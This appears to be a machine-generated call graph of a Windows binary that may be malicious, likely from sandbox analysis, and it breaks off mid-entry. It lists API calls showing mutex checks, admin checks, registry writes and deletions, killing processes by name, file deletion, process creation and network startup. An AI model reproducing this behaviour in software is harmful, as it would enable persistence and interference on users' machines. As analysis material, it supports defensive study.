18733->19265 18738 31be95 18741 31bea5 18738->18741 18742 31be9b CloseHandle 18738->18742 18739 31be89 CloseHandle 18739->18738 18743 31becc 18741->18743 18744 31bebf CloseHandle 18741->18744 18742->18741 18746 31bed2 LocalFree 18743->18746 18747 31bedc 18743->18747 18744->18743 18746->18747 18747->18720 18749 31bee5 ExitProcess 18747->18749 19242 3021e0 18753->19242 18757 31bc82 CreateMutexW 18758 31bc9f 18757->18758 18757->18759 18760 31c4b0 4 API calls 18758->18760 18759->18720 18761 31bcb0 18760->18761 19196 30bc80 LocalAlloc 18761->19196 18764 31bcc4 CreateMutexW 18764->18759 18765 31bce1 18764->18765 18766 31c4b0 4 API calls 18765->18766 18767 31bcf2 18766->18767 19209 30bd80 LocalAlloc 18767->19209 18788 3100e5 lstrcmpiW 18787->18788 18789 30119e 18787->18789 18790 3101c6 lstrcmpiW 18788->18790 18791 3100ff IsUserAnAdmin 18788->18791 18789->17880 18789->17881 18792 3101e0 OpenMutexW 18790->18792 18793 3102a5 lstrcmpiW 18790->18793 18794 310114 OpenEventW 18791->18794 18795 31016c ExitProcess 18791->18795 18798 310214 OpenMutexW 18792->18798 18799 3101fb WaitForSingleObject CloseHandle 18792->18799 18796 3102bf OpenMutexW 18793->18796 18797 31037e lstrcmpiW 18793->18797 18800 310162 ExitProcess 18794->18800 18801 310136 SetEvent 18794->18801 18802 3102f3 OpenMutexW 18796->18802 18803 3102da WaitForSingleObject CloseHandle 18796->18803 18797->18789 18806 310394 18797->18806 18804 310248 18798->18804 18805 31022f WaitForSingleObject CloseHandle 18798->18805 18799->18798 18807 310144 CloseHandle ExitProcess 18801->18807 18808 310156 CloseHandle 18801->18808 18809 310327 18802->18809 18810 31030e WaitForSingleObject CloseHandle 18802->18810 18803->18802 18811 310251 OpenMutexW 18804->18811 18812 31028b Sleep 18804->18812 18805->18804 18813 3103d7 Sleep 18806->18813 18814 31039d OpenMutexW 18806->18814 18815 31016a 18808->18815 18816 310330 OpenMutexW 18809->18816 18817 31036a Sleep 18809->18817 18810->18809 18818 310273 CloseHandle Sleep 18811->18818 18819 310287 18811->18819 18812->18789 18813->18789 18820 3103d3 18814->18820 18821 3103bf CloseHandle Sleep 18814->18821 18822 3101b3 18815->18822 18823 31017d OpenMutexW 18815->18823 18824 310352 CloseHandle Sleep 18816->18824 18825 310366 18816->18825 18817->18789 18818->18804 18819->18812 18820->18813 18821->18806 18822->18789 18823->18822 18826 31019f CloseHandle Sleep 18823->18826 18824->18809 18825->18817 18826->18815 18828 31c0c9 RtlGetVersion 18827->18828 18829 301285 18827->18829 18828->18829 18829->17889 18830 31c3a0 AllocateAndInitializeSid 18829->18830 18831 31c3ea CheckTokenMembership 18830->18831 18832 30128f 18830->18832 18833 31c405 FreeSid 18831->18833 18834 31c3fe 18831->18834 18832->17889 18835 316410 LocalAlloc 18832->18835 18833->18832 18834->18833 18836 316452 18835->18836 18837 316850 18835->18837 18838 31684a 18836->18838 18840 316486 _wcscat 18836->18840 18837->17916 18838->18837 18839 316858 LocalFree 18838->18839 18839->18837 18841 3164bf 18840->18841 18842 31650e 18840->18842 18845 32359a __snwprintf 102 API calls 18841->18845 18843 316527 LocalAlloc 18842->18843 18844 3165cc 18842->18844 18846 316547 GetWindowsDirectoryW 18843->18846 18862 3165c7 18843->18862 18847 3165e1 SHGetKnownFolderPath 18844->18847 18848 31665e 18844->18848 18865 3164e9 _wcscat 18845->18865 18849 3165ba LocalFree 18846->18849 18850 31655d 18846->18850 18853 3165fb 18847->18853 18847->18865 18851 3166f0 18848->18851 18852 316673 SHGetKnownFolderPath 18848->18852 18849->18862 18854 32359a __snwprintf 102 API calls 18850->18854 18856 316709 LocalAlloc 18851->18856 18857 3167b8 18851->18857 18855 31668d 18852->18855 18852->18865 18858 32359a __snwprintf 102 API calls 18853->18858 18859 31659a _wcscat 18854->18859 18860 32359a __snwprintf 102 API calls 18855->18860 18856->18862 18863 316729 GetTempPathW 18856->18863 18861 3167cd SHGetKnownFolderPath 18857->18861 18857->18865 18864 31662c CoTaskMemFree 18858->18864 18859->18849 18866 3166be CoTaskMemFree 18860->18866 18861->18865 18867 3167e7 18861->18867 18862->18865 18868 3167a6 LocalFree 18863->18868 18869 31673f 18863->18869 18864->18865 18865->17916 18866->18865 18870 32359a __snwprintf 102 API calls 18867->18870 18868->18862 18872 32359a __snwprintf 102 API calls 18869->18872 18871 316818 CoTaskMemFree 18870->18871 18871->18865 18873 316786 _wcscat 18872->18873 18873->18868 18875 316893 GetSystemDirectoryW 18874->18875 18876 3012c3 LocalFree 18874->18876 18877 316987 LocalFree 18875->18877 18878 3168aa LocalAlloc 18875->18878 18876->17889 18877->18876 18878->18877 18879 3168c4 18878->18879 18880 3179f0 5 API calls 18879->18880 18881 3168e6 18880->18881 18882 32359a __snwprintf 102 API calls 18881->18882 18883 316902 _memset 18882->18883 18884 316915 CreateProcessW 18883->18884 18885 316962 LocalFree LocalFree 18884->18885 18886 31697d LocalFree 18884->18886 18885->18876 18886->18877 18888 31c4f0 GetSecurityDescriptorSacl 18887->18888 18889 30133e CreateEventW 18887->18889 18890 31c525 LocalFree 18888->18890 18891 31c50a SetNamedSecurityInfoW 18888->18891 18889->17907 18889->17908 18890->18889 18891->18890 18893 30fa51 GetModuleFileNameW 18892->18893 18894 301563 18892->18894 18895 30fa6b 18893->18895 18896 30fa6f LoadLibraryW 18893->18896 18894->17934 18894->17935 18895->18894 18896->18895 18897 30fa8d GetModuleFileNameW 18896->18897 18897->18895 18899 31760c CreateMutexW 18898->18899 18901 301574 18898->18901 18900 317629 18899->18900 18899->18901 18900->18901 18901->17942 18901->17943 18903 32359a __snwprintf 102 API calls 18902->18903 18904 314204 RegCreateKeyExW 18903->18904 18905 314234 RegCloseKey 18904->18905 18911 301585 18904->18911 18906 31424b _memset 18905->18906 18907 30b4a0 103 API calls 18906->18907 18908 314257 18907->18908 18909 31425e GetSystemTime SystemTimeToFileTime 18908->18909 18908->18911 21086 30b510 18909->21086 18911->17952 18911->17953 18913 323520 _memset 18912->18913 18914 3142d9 GetModuleFileNameW 18913->18914 18915 301596 18914->18915 18916 3142f8 18914->18916 18915->17957 18915->17958 21093 31c570 CreateFileW 18916->21093 18919 32359a __snwprintf 102 API calls 18920 31433c RegOpenKeyExW 18919->18920 18921 314363 RegSetValueExW 18920->18921 18922 3143b9 LocalFree 18920->18922 18923 31438b RegCloseKey LocalFree 18921->18923 18924 3143ac RegCloseKey 18921->18924 18922->18915 18923->18915 18924->18922 18926 323520 _memset 18925->18926 18927 3143f5 GetModuleFileNameW 18926->18927 18928 314414 18927->18928 18929 3015a7 18927->18929 18930 32359a __snwprintf 102 API calls 18928->18930 18929->17966 18929->17967 18931 31442f RegOpenKeyExW 18930->18931 18931->18929 18932 314456 lstrlenW RegSetValueExW 18931->18932 18933 314489 RegCloseKey 18932->18933 18934 31449d RegCloseKey 18932->18934 18933->18929 18934->18929 18936 30ff31 LocalAlloc 18935->18936 18937 3015df 18935->18937 18938 30fff5 CoTaskMemFree 18936->18938 18939 30ff4b wnsprintfW 18936->18939 18937->17978 18937->17979 18938->18937 19011 301cb5 _memset 19010->19011 19012 301240 19010->19012 19013 301cd1 GetWindowsDirectoryW 19011->19013 19012->17930 19012->17931 19014 301cee _memset 19013->19014 19015 301fdf 19013->19015 19017 31c1e0 3 API calls 19014->19017 19015->19012 19016 301fe5 CloseHandle 19015->19016 19016->19012 19018 301d12 19017->19018 19019 301d17 19018->19019 19020 301d39 19018->19020 19022 32359a __snwprintf 102 API calls 19019->19022 19021 32359a __snwprintf 102 API calls 19020->19021 19023 301d34 _memset 19021->19023 19022->19023 19024 301d75 GetCurrentDirectoryW 19023->19024 19024->19015 19025 301d92 LocalAlloc 19024->19025 19025->19015 19026 301dbc 14 API calls 19025->19026 19027 30a1b0 26 API calls 19026->19027 19028 301f67 19027->19028 19029 301fc9 19028->19029 19030 301f6f WaitForSingleObject 19028->19030 19029->19015 19032 301fd2 LocalFree 19029->19032 19031 301f90 TerminateProcess CloseHandle CloseHandle 19030->19031 19031->19029 19032->19015 21140 30fcf0 19034->21140 19037 30fe82 lstrlenW lstrlenW LocalAlloc 19039 30ff00 CoTaskMemFree 19037->19039 19040 30fec1 19037->19040 19038 3013c5 19038->17940 19038->17941 19039->19038 19041 32359a __snwprintf 102 API calls 19040->19041 19042 30fedf lstrlenW CoTaskMemFree 19041->19042 19042->19038 19044 30fe20 109 API calls 19043->19044 19045 30faed 19044->19045 19119 30b885 GetModuleFileNameW 19118->19119 19119->18699 19119->18710 19121 302173 CreateEventW 19120->19121 19122 30216c 19120->19122 19121->19122 19123 30218f CreateThread 19121->19123 19122->18753 19125 3041f0 19122->19125 19123->19122 19124 3021b9 CloseHandle 19123->19124 19296 3025a0 19123->19296 19124->19122 19126 3041fc 19125->19126 19127 30420f CreateEventW 19125->19127 19126->19127 19129 304205 19126->19129 19128 30422b CreateEventW 19127->19128 19127->19129 19130 304287 CloseHandle 19128->19130 19131 304247 CreateThread 19128->19131 19129->18753 19133 317640 19129->19133 19130->19129 19131->19129 19132 304271 CloseHandle 19131->19132 19409 304320 19131->19409 19132->19130 19134 317653 CreateThread 19133->19134 19135 31764c 19133->19135 19134->19135 19694 3176f0 GetModuleHandleW 19134->19694 19135->18753 19136 306850 GetModuleHandleW GetProcAddress GetProcAddress 19135->19136 19137 306890 19136->19137 19137->18753 19138 3169a0 lstrlenW 19137->19138 19139 3169f7 19138->19139 19140 3169b8 CreateEventW 19138->19140 19143 316adf 19139->19143 19145 31c3a0 3 API calls 19139->19145 19140->19139 19141 3169d4 CreateThread 19140->19141 19141->19139 19142 3169fb LocalFree 19141->19142 20240 30ba30 19141->20240 19142->19139 19144 316aed 19143->19144 19784 312560 19143->19784 19147 316afb 19144->19147 19797 3122d0 LocalAlloc 19144->19797 19148 316a23 19145->19148 19150 316b09 19147->19150 19832 31ac50 CreateThread 19147->19832 19148->19143 19151 30fe20 109 API calls 19148->19151 19834 308cd0 19150->19834 19162 316a51 _memset 19151->19162 19155 316b6a WSAStartup 19157 316bc3 19155->19157 19158 316b7d 19155->19158 19156 316b1c CreateEventW 19156->19155 19159 316b38 CreateThread 19156->19159 19157->18753 19170 305010 19157->19170 19160 316ba0 CreateThread 19158->19160 19161 316b86 CreateThread 19158->19161 19163 316b5b 19159->19163 19164 316b5d CloseHandle 19159->19164 20256 30f100 19159->20256 19160->19157 19165 316bca WSACleanup 19160->19165 20316 321030 OpenEventW 19160->20316 19161->19160 20375 31b630 CreateEventW 19161->20375 19162->19143 19166 32359a __snwprintf 102 API calls 19162->19166 19163->19155 19164->19155 19165->19157 19167 316aa4 19166->19167 19705 30a680 19167->19705 19171 305023 CreateThread 19170->19171 19172 30501c 19170->19172 19171->19172 20898 305140 LocalAlloc 19171->20898 19172->18753 19173 3045b0 19172->19173 19174 3045c3 19173->19174 19178 3045bc 19173->19178 21069 304700 19174->21069 19177 30460d CreateThread 19177->19178 19178->18753 19183 30bb80 LocalAlloc 19178->19183 19181 304700 103 API calls 19182 304602 19181->19182 19182->19177 19182->19178 19184 30bba0 LocalAlloc 19183->19184 19185 30bc6b 19183->19185 19186 30bc61 LocalFree 19184->19186 19187 30bbba LocalAlloc 19184->19187 19185->18757 19185->18758 19186->19185 19188 30bbd4 GetModuleFileNameW 19187->19188 19189 30bc57 LocalFree 19187->19189 19190 30bbe9 GetWindowsDirectoryW 19188->19190 19191 30bc4d LocalFree 19188->19191 19189->19186 19190->19191 19192 30bbfc 19190->19192 19191->19189 19193 32359a __snwprintf 102 API calls 19192->19193 19194 30bc13 lstrcmpiW 19193->19194 19194->19191 19195 30bc28 LocalFree LocalFree LocalFree 19194->19195 19195->19185 19197 30bca0 LocalAlloc 19196->19197 19198 30bd6b 19196->19198 19199 30bd61 LocalFree 19197->19199 19200 30bcba LocalAlloc 19197->19200 19198->18764 19198->18765 19199->19198 19201 30bcd4 GetModuleFileNameW 19200->19201 19202 30bd57 LocalFree 19200->19202 19203 30bce9 GetSystemDirectoryW 19201->19203 19204 30bd4d LocalFree 19201->19204 19202->19199 19203->19204 19205 30bcfc 19203->19205 19204->19202 19206 32359a __snwprintf 102 API calls 19205->19206 19210 30bda0 LocalAlloc 19209->19210 19211 30be6b 19209->19211 19243 3021f8 19242->19243 19244 3021ec SetEvent 19242->19244 19245 302201 WaitForSingleObject CloseHandle 19243->19245 19246 302227 19243->19246 19244->19243 19245->19246 19247 302230 CloseHandle 19246->19247 19248 302246 19246->19248 19247->19248 19249 3042b0 19248->19249 19250 3042c8 19249->19250 19251 3042bc SetEvent 19249->19251 19252 3042d1 WaitForSingleObject CloseHandle 19250->19252 19253 3042f7 19250->19253 19251->19250 19252->19253 19254 304300 CloseHandle 19253->19254 19255 304316 19253->19255 19254->19255 19255->18722 19257 30507a 19256->19257 19258 30506c WaitForSingleObject 19256->19258 19259 317690 19257->19259 19258->19257 19260 3176a3 19259->19260 19263 31769c 19259->19263 19261 3176ac PostMessageW 19260->19261 19262 3176be 19260->19262 19261->19262 19262->19263 19264 3176c7 WaitForSingleObject CloseHandle 19262->19264 19263->18732 19263->18733 19264->19263 19266 316c02 19265->19266 19267 316bf6 SetEvent 19265->19267 19268 316c0b WaitForSingleObject 19266->19268 19269 316c1a 19266->19269 19267->19266 19268->19269 19270 316c30 19269->19270 19271 316c23 CloseHandle 19269->19271 19272 316c45 19270->19272 19273 316c39 SetEvent 19270->19273 19271->19270 19274 316c5d 19272->19274 19275 316c4e WaitForSingleObject 19272->19275 19273->19272 19276 316c73 19274->19276 19277 316c66 CloseHandle 19274->19277 19275->19274 19278 316c88 19276->19278 19279 316c7c CloseHandle 19276->19279 19277->19276 19280 316c91 SetEvent 19278->19280 19281 316c9e 19278->19281 19279->19278 19280->19281 19282 316ca7 WaitForSingleObject 19281->19282 19283 316cb6 19281->19283 19282->19283 19284 316ccb 19283->19284 19285 316cbf CloseHandle 19283->19285 19286 316ce1 19284->19286 19287 316cd4 SetEvent 19284->19287 19285->19284 19288 316cf9 19286->19288 19289 316cea WaitForSingleObject 19286->19289 19287->19286 19290 316d02 CloseHandle 19288->19290 19291 316d0e 19288->19291 19289->19288 19290->19291 19292 316d24 19291->19292 19293 316d17 CloseHandle 19291->19293 21081 31ac90 19292->21081 19293->19292 19297 3025af 19296->19297 19303 3025cd 19296->19303 19299 3025bd 19297->19299 19306 302250 19297->19306 19298 3025cb 19299->19298 19323 302490 CreateToolhelp32Snapshot 19299->19323 19301 302250 139 API calls 19301->19303 19302 3025f2 WaitForMultipleObjects 19302->19298 19302->19303 19303->19298 19303->19301 19303->19302 19305 302490 8 API calls 19303->19305 19305->19302 19307 302278 19306->19307 19308 3022c3 19307->19308 19332 3179f0 19307->19332 19341 302640 19308->19341 19311 3022ea _memset 19312 302483 19311->19312 19313 302319 GetSystemDirectoryW 19311->19313 19312->19299 19314 302336 _memset 19313->19314 19315 30246d 19313->19315 19317 302350 LocalAlloc 19314->19317 19315->19312 19316 302476 LocalFree 19315->19316 19316->19312 19317->19315 19318 3023b7 19317->19318 19319 32359a __snwprintf 102 API calls 19318->19319 19320 3023d6 CreateProcessW 19319->19320 19321 302460 LocalFree 19320->19321 19322 30240c WaitForSingleObject CloseHandle CloseHandle LocalFree LocalFree 19320->19322 19321->19315 19322->19312 19324 302597 19323->19324 19325 3024b7 Process32FirstW 19323->19325 19324->19298 19326 30258d CloseHandle 19325->19326 19331 3024da 19325->19331 19326->19324 19327 302503 lstrcmpiW 19329 302524 OpenProcess 19327->19329 19327->19331 19328 302574 Process32NextW 19328->19326 19328->19331 19330 302551 TerminateProcess CloseHandle 19329->19330 19329->19331 19330->19331 19331->19327 19331->19328 19333 317ab2 19332->19333 19334 317a08 19332->19334 19338 317b11 LocalAlloc 19333->19338 19340 317a2a _memset _memmove 19333->19340 19335 317a5a lstrlenW LocalAlloc 19334->19335 19336 317a0e lstrlenW 19334->19336 19337 317a95 lstrcpyW 19335->19337 19339 317a8e _memmove 19335->19339 19336->19340 19337->19340 19338->19339 19339->19340 19340->19307 19360 31a210 19341->19360 19343 302666 LocalAlloc 19344 302905 19343->19344 19345 3026a7 CreateToolhelp32Snapshot 19343->19345 19344->19311 19346 3026c5 Process32FirstW 19345->19346 19347 3028ee 19345->19347 19349 3028e4 CloseHandle 19346->19349 19354 3026e8 _memset codecvt 19346->19354 19347->19344 19348 3028f4 LocalFree 19347->19348 19348->19344 19349->19347 19351 3028cb Process32NextW 19351->19349 19351->19354 19352 302775 lstrcmpiW 19352->19354 19353 3027b6 lstrcpyW 19353->19354 19354->19351 19354->19352 19354->19353 19355 30285a StrCatW StrCatW 19354->19355 19356 30280a lstrcpyW 19354->19356 19359 302a80 77 API calls 19354->19359 19362 303740 19354->19362 19358 302940 77 API calls 19355->19358 19366 302940 19356->19366 19358->19354 19359->19354 19361 31a224 19360->19361 19361->19343 19363 303750 19362->19363 19370 3039e0 19363->19370 19365 303766 19365->19354 19367 302969 construct codecvt 19366->19367 19381 302bb0 19367->19381 19373 3039e5 19370->19373 19371 303a0d 19371->19365 19373->19371 19374 303cb0 19373->19374 19377 303db0 19374->19377 19378 303dc0 19377->19378 19379 303e00 67 API calls 19378->19379 19380 303cbf 19379->19380 19380->19373 19382 302bc0 19381->19382 19385 302e70 19382->19385 19384 302990 19384->19354 19386 302e83 19385->19386 19387 302e8a codecvt 19386->19387 19388 302eac 19386->19388 19392 302ef0 19387->19392 19403 303110 19388->19403 19391 302eaa codecvt 19391->19384 19393 302f01 construct 19392->19393 19394 3031e0 construct 67 API calls 19393->19394 19395 302f0e construct 19393->19395 19394->19395 19396 302f32 19395->19396 19397 302f57 19395->19397 19399 302fd0 construct 67 API calls 19396->19399 19398 303110 construct 77 API calls 19397->19398 19402 302f55 codecvt 19398->19402 19400 302f47 19399->19400 19401 302fd0 construct 67 API calls 19400->19401 19401->19402 19402->19391 19404 303121 construct 19403->19404 19405 30312e 19404->19405 19406 303680 construct 67 API calls 19404->19406 19407 30314c codecvt 19405->19407 19408 3034c0 construct 77 API calls 19405->19408 19406->19405 19407->19391 19408->19407 19410 304326 WaitForSingleObject 19409->19410 19411 304406 19410->19411 19414 304342 19410->19414 19414->19410 19415 3043f4 ResetEvent 19414->19415 19416 3043d2 SetEvent 19414->19416 19417 30437a OpenEventW 19414->19417 19421 304410 CreateToolhelp32Snapshot 19414->19421 19429 30b6d0 19414->19429 19454 3158b0 19414->19454 19511 3044e0 CreateToolhelp32Snapshot 19414->19511 19415->19414 19416->19414 19417->19414 19419 304392 SetEvent CloseHandle 19417->19419 19419->19411 19422 3044d2 19421->19422 19423 304437 Process32FirstW 19421->19423 19422->19414 19424 304456 19423->19424 19425 3044c8 CloseHandle 19423->19425 19426 3044b3 Process32NextW 19424->19426 19427 30447f StrCmpIW 19424->19427 19425->19422 19426->19424 19426->19425 19427->19424 19428 3044a0 CloseHandle 19427->19428 19428->19422 19430 30fe20 109 API calls 19429->19430 19431 30b6eb 19430->19431 19432 30b857 19431->19432 19433 30b6fb CreateDirectoryW 19431->19433 19432->19414 19434 30b70c GetLastError 19433->19434 19435 30b71d LocalAlloc 19433->19435 19434->19435 19436 30b847 19434->19436 19435->19436 19437 30b737 19435->19437 19436->19432 19439 30b84d LocalFree 19436->19439 19438 32359a __snwprintf 102 API calls 19437->19438 19440 30b753 CreateFileW GetLastError 19438->19440 19439->19432 19441 30b78b 19440->19441 19442 30b837 19441->19442 19443 30b79b 19441->19443 19519 30a0f0 19441->19519 19442->19436 19444 30b83d LocalFree 19442->19444 19445 30b7f8 LocalFree LocalFree 19443->19445 19444->19436 19445->19432 19448 30b7c7 WriteFile 19450 30b813 LocalFree 19448->19450 19451 30b7e7 CloseHandle 19448->19451 19449 30b81d 19452 30b823 CloseHandle 19449->19452 19453 30b82d DeleteFileW 19449->19453 19450->19449 19451->19445 19452->19453 19453->19442 19455 3158bd __write_nolock 19454->19455 19456 3179f0 5 API calls 19455->19456 19460 315955 19455->19460 19456->19455 19457 315a6e 19459 315a7f wnsprintfW RegDeleteKeyExW 19457->19459 19534 31f3b0 19459->19534 19460->19457 19526 317d60 19460->19526 19463 31f3b0 19464 315b17 wnsprintfW RegDeleteKeyExW 19463->19464 19465 31f3b0 19464->19465 19466 315b63 wnsprintfW RegDeleteKeyExW 19465->19466 19467 312680 6 API calls 19466->19467 19468 315ba3 19467->19468 19536 313160 19468->19536 19472 315bad 19572 312e00 SHGetKnownFolderPath 19472->19572 19476 315bbc 19613 310010 SHGetKnownFolderPath 19476->19613 19512 304507 Process32FirstW 19511->19512 19514 3045a2 19511->19514 19513 304598 CloseHandle 19512->19513 19515 304526 19512->19515 19513->19514 19514->19414 19516 304583 Process32NextW 19515->19516 19517 30454f StrCmpIW 19515->19517 19516->19513 19516->19515 19517->19515 19518 304570 CloseHandle 19517->19518 19518->19514 19520 32359a __snwprintf 102 API calls 19519->19520 19521 30a118 RegGetValueW 19520->19521 19522 30a152 LocalAlloc 19521->19522 19523 30a193 19521->19523 19522->19523 19524 30a167 RegGetValueW 19522->19524 19523->19448 19523->19449 19524->19523 19525 30a1a0 LocalFree 19524->19525 19525->19523 19527 317e20 19526->19527 19528 317d78 19526->19528 19532 317e78 LocalAlloc 19527->19532 19533 317d9a _memset _memmove 19527->19533 19529 317dc9 lstrlenA LocalAlloc 19528->19529 19530 317d7e lstrlenA 19528->19530 19531 317e03 lstrcpyA 19529->19531 19529->19533 19530->19533 19531->19533 19532->19533 19533->19460 19535 315acb wnsprintfW RegDeleteKeyExW 19534->19535 19535->19463 19537 313173 LocalAlloc 19536->19537 19538 31329d 19536->19538 19539 313189 SHGetKnownFolderPath 19537->19539 19540 3131dd SHGetKnownFolderPath 19537->19540 19554 312f20 OpenEventW 19538->19554 19541 3131a0 19539->19541 19542 3131d3 LocalFree 19539->19542 19540->19538 19543 3131f8 LocalAlloc 19540->19543 19546 32359a __snwprintf 102 API calls 19541->19546 19542->19540 19544 313293 CoTaskMemFree 19543->19544 19545 313212 19543->19545 19544->19538 19547 32359a __snwprintf 102 API calls 19545->19547 19548 3131bc DeleteFileW CoTaskMemFree 19546->19548 19549 31322e LocalAlloc 19547->19549 19548->19542 19550 313247 19549->19550 19551 313289 LocalFree 19549->19551 19552 32359a __snwprintf 102 API calls 19550->19552 19551->19544 19553 313268 DeleteFileW RemoveDirectoryW LocalFree 19552->19553 19553->19551 19555 312f54 SetEvent CloseHandle 19554->19555 19556 312f6e OpenMutexW 19554->19556 19555->19556 19557 312fb5 SHGetKnownFolderPath 19556->19557 19558 312f99 WaitForSingleObject CloseHandle 19556->19558 19559 312fd3 LocalAlloc 19557->19559 19560 313104 19557->19560 19558->19557 19561 312ff3 19559->19561 19562 3130f7 CoTaskMemFree 19559->19562 19563 313115 wnsprintfW RegDeleteKeyExW 19560->19563 19564 3130ea LocalFree 19561->19564 19565 32359a __snwprintf 102 API calls 19561->19565 19562->19560 19563->19472 19564->19562 19566 313024 lstrlenW 19565->19566 19568 31306f _memset 19566->19568 19567 31309e GetFileAttributesW 19567->19564 19567->19568 19568->19567 19569 3130b9 19568->19569 19570 3130bb SHFileOperationW 19568->19570 19569->19564 19570->19569 19571 3130ce Sleep 19570->19571 19571->19567 19573 312e21 LocalAlloc 19572->19573 19574 312f0d 19572->19574 19575 312f03 CoTaskMemFree 19573->19575 19577 312e3b 19573->19577 19585 312ab0 CoInitializeEx 19574->19585 19575->19574 19576 312ef9 LocalFree 19576->19575 19577->19576 19578 32359a __snwprintf 102 API calls 19577->19578 19579 312e66 lstrlenW 19578->19579 19586 312af4 CoInitializeSecurity CoCreateInstance 19585->19586 19605 312aef CoUninitialize 19585->19605 19588 312b35 19586->19588 19586->19605 19644 316380 VariantInit 19588->19644 19605->19476 19695 323520 _memset 19694->19695 19696 317710 RegisterClassW 19695->19696 19697 317751 CreateWindowExW 19696->19697 19698 317740 GetLastError 19696->19698 19700 3177c3 19697->19700 19701 317788 GetMessageW 19697->19701 19698->19697 19699 3177db 19698->19699 19700->19699 19704 3177c9 UnregisterClassW 19700->19704 19702 3177a1 TranslateMessage DispatchMessageW 19701->19702 19703 3177b7 DestroyWindow 19701->19703 19702->19701 19703->19700 19704->19699 19706 30a6c4 _memset 19705->19706 19707 3179f0 5 API calls 19706->19707 19708 30a6e6 _memset 19707->19708 19709 3179f0 5 API calls 19708->19709 19710 30a732 CoInitializeEx 19709->19710 19711 30a770 CoInitializeSecurity 19710->19711 19712 30a769 LocalFree 19710->19712 19713 30a797 CoUninitialize 19711->19713 19714 30a79c CoCreateInstance 19711->19714 19712->19143 19713->19712 19714->19713 19716 30a7cb 19714->19716 19870 316380 VariantInit 19716->19870 19718 30a7d6 19871 316380 VariantInit 19718->19871 19720 30a823 19872 316380 VariantInit 19720->19872 19722 30a86d 19873 316380 VariantInit 19722->19873 19724 30a8b7 19874 3163f0 VariantClear 19724->19874 19726 30a9bf 19785 30fe20 109 API calls 19784->19785 19786 312574 19785->19786 19787 312584 LocalAlloc 19786->19787 19788 31266e 19786->19788 19789 312664 LocalFree 19787->19789 19790 31259e wnsprintfW 19787->19790 19788->19144 19789->19788 19791 312610 19790->19791 19792 3125cf RegOpenKeyW 19790->19792 19794 312619 RegOpenKeyW 19791->19794 19795 31265a LocalFree 19791->19795 19792->19791 19793 3125e7 RegSetValueExW RegCloseKey 19792->19793 19793->19791 19794->19795 19796 312631 RegSetValueExW RegCloseKey 19794->19796 19795->19789 19796->19795 19798 3122f0 SHGetKnownFolderPath 19797->19798 19799 312558 19797->19799 19800 31230b 19798->19800 19801 31254e LocalFree 19798->19801 19799->19147 19802 32359a __snwprintf 102 API calls 19800->19802 19801->19799 19803 312327 19802->19803 19804 30fe20 109 API calls 19803->19804 19805 312338 19804->19805 19806 312544 CoTaskMemFree 19805->19806 19807 312348 LocalAlloc 19805->19807 19806->19801 19808 312362 19807->19808 19809 31253a LocalFree 19807->19809 19884 32477b 19808->19884 19809->19806 19812 312530 LocalFree 19812->19809 19813 3123a4 LocalAlloc 19814 312526 CoTaskMemFree 19813->19814 19815 3123be 19813->19815 19814->19812 19816 32359a __snwprintf 102 API calls 19815->19816 19817 3123da CreateDirectoryW 19816->19817 19818 312403 LocalAlloc 19817->19818 19819 3123f2 GetLastError 19817->19819 19820 31251c LocalFree 19818->19820 19821 31241d 19818->19821 19819->19818 19819->19820 19820->19814 19822 32359a __snwprintf 102 API calls 19821->19822 19833 31ac79 19832->19833 20135 31ace0 GetModuleHandleW 19832->20135 19833->19150 19835 308cdf 19834->19835 19836 308ce7 19835->19836 19837 310010 6 API calls 19835->19837 19836->19155 19836->19156 19838 308cfc 19837->19838 19838->19836 20146 3081c0 19838->20146 19841 309096 LocalFree 19841->19836 19842 308d37 LocalAlloc 19843 308d51 lstrcpyW StrStrIW CreateFileW 19842->19843 19844 309076 19842->19844 19845 308da0 GetFileSize 19843->19845 19846 30906c LocalFree 19843->19846 19847 309086 19844->19847 19848 30907c LocalFree 19844->19848 19849 308db9 LocalAlloc 19845->19849 19850 30905c 19845->19850 19846->19844 19847->19841 19851 30908c LocalFree 19847->19851 19848->19847 19849->19850 19852 308dd2 ReadFile 19849->19852 19850->19846 19853 309062 CloseHandle 19850->19853 19851->19841 19854 309052 LocalFree 19852->19854 19855 308df6 CloseHandle 19852->19855 19853->19846 19854->19850 19856 308e3f 19855->19856 20214 31e1a0 19856->20214 19870->19718 19871->19720 19872->19722 19873->19724 19874->19726 19885 324799 19884->19885 19888 3247ae 19884->19888 19886 3272de __fptostr 66 API calls 19885->19886 19889 32479e 19886->19889 19887 3247d2 19904 3299a1 19887->19904 19888->19887 19890 3247bd 19888->19890 19892 32728c __fptostr 11 API calls 19889->19892 19893 3272de __fptostr 66 API calls 19890->19893 19897 312383 SHGetKnownFolderPath 19892->19897 19895 3247c2 19893->19895 19896 32728c __fptostr 11 API calls 19895->19896 19896->19897 19897->19812 19897->19813 19905 324404 _LocaleUpdate::_LocaleUpdate 76 API calls 19904->19905 19906 329a08 19905->19906 19907 3272de __fptostr 66 API calls 19906->19907 19908 329a0d 19907->19908 19909 329a17 19908->19909 19924 329a4e __aulldvrm __snprintf _strlen 19908->19924 19948 32bf7e 19908->19948 19910 3272de __fptostr 66 API calls 19909->19910 19911 329a1c 19910->19911 19913 32728c __fptostr 11 API calls 19911->19913 19914 329a27 19913->19914 19915 327fff __setmbcp_nolock 5 API calls 19914->19915 19916 3247ff 19915->19916 19916->19897 19927 326340 19916->19927 19918 32990c 97 API calls __snprintf 19918->19924 19919 3246ad _free 66 API calls 19919->19924 19920 32a0b9 DecodePointer 19920->19924 19921 32993f 97 API calls __snprintf 19921->19924 19922 32dbe1 78 API calls __cftof 19922->19924 19923 32c14e __malloc_crt 66 API calls 19923->19924 19924->19909 19924->19914 19924->19918 19924->19919 19924->19920 19924->19921 19924->19922 19924->19923 19925 32a122 DecodePointer 19924->19925 19926 32a143 DecodePointer 19924->19926 19955 32c373 19924->19955 19925->19924 19926->19924 19928 32bf7e __fclose_nolock 66 API calls 19927->19928 19949 32bf8a 19948->19949 19950 32bf9f 19948->19950 19951 3272de __fptostr 66 API calls 19949->19951 19950->19924 19952 32bf8f 19951->19952 19953 32728c __fptostr 11 API calls 19952->19953 19956 324404 _LocaleUpdate::_LocaleUpdate 76 API calls 19955->19956 19957 32c386 19956->19957 19957->19924 20136 323520 _memset 20135->20136 20137 31ad00 RegisterClassW 20136->20137 20138 31ad41 CreateWindowExW 20137->20138 20139 31ad30 GetLastError 20137->20139 20141 31adb3 20138->20141 20142 31ad78 GetMessageW 20138->20142 20139->20138 20140 31adcb 20139->20140 20141->20140 20145 31adb9 UnregisterClassW 20141->20145 20143 31ad91 TranslateMessage DispatchMessageW 20142->20143 20144 31ada7 